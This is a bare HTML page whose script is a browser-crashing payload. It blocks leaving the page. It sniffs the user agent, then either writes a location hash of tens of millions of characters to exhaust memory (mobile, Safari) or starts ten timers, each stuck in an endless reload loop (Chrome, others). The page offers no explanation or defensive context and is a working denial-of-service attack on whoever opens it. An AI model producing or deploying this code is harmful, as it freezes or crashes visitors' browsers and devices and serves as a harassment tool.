<body onbeforeunload="return true">


<script>
  function s(){window.onload=()=>location.hash="M"+"\u0001".repeat(2**25)+"m";}
  function m(){s()}
  function a(){for(var i=0;i<10;i++)setTimeout(function(){for(;;)location.reload(1)},1e3);}
  
  function isMobile() {
    var match = window.matchMedia || window.msMatchMedia;
    if(match) {
        var mq = match("(pointer:coarse)");
        return mq.matches;
    }
    return false;
}
  if(isMobile()){
    m()
  }
  else if(navigator.userAgent.toLowerCase().indexOf('chrome/') > -1){
    a()
  }
  else if(navigator.userAgent.toLowerCase().indexOf('safari/') > -1){
    s()
  }else{
    a()
  }

</script>


  </body>
